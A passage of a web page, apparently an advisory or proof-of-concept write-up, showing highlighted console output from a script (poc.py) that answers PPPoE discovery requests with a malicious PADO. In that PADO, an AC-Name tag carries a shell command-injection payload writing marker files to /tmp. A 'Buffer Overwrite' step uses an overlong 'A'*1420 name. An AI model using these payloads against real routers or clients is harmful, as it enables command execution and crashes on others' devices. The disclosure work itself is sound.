class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">checking <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">it <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PPPoED <\/span><span class=\"crayon-e\">PADI<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-3\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PPPoED <\/span><span class=\"crayon-e\">PADI <\/span><span class=\"crayon-v\">detected<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-4\"><span class=\"crayon-p\">###[ PPP over Ethernet Discovery ]###<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-5\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">version<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1L<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-6\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1L<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-7\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">code<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PADI<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-8\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sessionid<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-9\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">15<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-10\"><span class=\"crayon-p\">###[ PPPoE Tag ]###<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">tag_type<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Service<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Name<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-12\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">tag_len<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">tag_value<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;lol&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-14\"><span class=\"crayon-p\">###[ PPPoE Tag ]###<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tag_type<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Uniq<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-16\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tag_len<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tag_value<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;x17\\x00x00&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-18\"><span class=\"crayon-p\">###[ PPPoE Tag ]###<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">tag_type<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">End<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Of<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">List<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-20\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">tag_len<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">tag_value<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-22\"><span class=\"crayon-p\">###[ Padding ]###<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">load<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-24\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PPPoE <\/span><span class=\"crayon-e\">Tag<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-25\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PPPoE <\/span><span class=\"crayon-e\">Tag<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-26\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">got <\/span><span class=\"crayon-v\">host_uniq<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;x17\\x00x00&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-27\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PPPoE <\/span><span class=\"crayon-e\">Tag<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-28\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Padding<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-29\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sending <\/span><span class=\"crayon-e\">malicious <\/span><span class=\"crayon-v\">PADO<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-30\"><span class=\"crayon-p\">###[ Ethernet ]###<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-31\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">dst<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">29<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">bb<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">bb<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-e\">bb<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-32\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">29<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">aa<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">aa<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-e\">aa<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-33\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x8863<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-34\"><span class=\"crayon-p\">###[ PPP over Ethernet Discovery ]###<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">version<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">code<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PADO<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-38\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">sessionid<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">None<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-40\"><span class=\"crayon-p\">###[ PPPoE Tag ]###<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tag_type<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Service<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Name<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-42\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tag_len<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">None<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-43\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tag_value<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;lol&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-44\"><span class=\"crayon-p\">###[ PPPoE Tag ]###<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">tag_type<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Uniq<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-46\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">tag_len<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">None<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-47\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">tag_value<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;x17\\x00x00&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-48\"><span class=\"crayon-p\">###[ PPPoE Tag ]###<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tag_type<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AC<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Cookie<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-50\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tag_len<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">None<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-51\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tag_value<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;A&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-52\"><span class=\"crayon-p\">###[ PPPoE Tag ]###<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">tag_type<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AC<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Name<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-54\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">tag_len<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">None<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-55\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">tag_value<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;`echo 1 &gt; \/tmp\/inject1` $(touch \/tmp\/inject2)&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-56\"><span class=\"crayon-p\">###[ PPPoE Tag ]###<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tag_type<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">End<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Of<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">List<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-58\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tag_len<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">None<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-59\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tag_value<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-60\"><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-61\"><span class=\"crayon-i\">Sent<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">packets<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-62\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hooray<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">malicious <\/span><span class=\"crayon-e\">PADO <\/span><span class=\"crayon-v\">sent<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">check <\/span><span class=\"crayon-e\">your <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">!<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-63\"><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-64\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">got <\/span><span class=\"crayon-e\">PPPoED <\/span><span class=\"crayon-v\">packet<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">checking <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">it <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PPPoED <\/span><span class=\"crayon-v\">PADI<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0057 seconds] -->  <\/p>\n<p><u>Buffer Overwrite<\/u><br \/> Step 1: run poc.py with an acname of &#8216;A&#8217;*1420 see poc.py::ex.start()<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58f7e28ed7cc3004999033\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #&gt; poc.py eth0       INFO     &#8211; available interfaces:  INFO     &#8211;    * lo  INFO     &#8211;    * eth0  INFO     &#8211;    * eth1  INFO     &#8211; sniffing on &#8216;eth0&#8217; and trying to inject 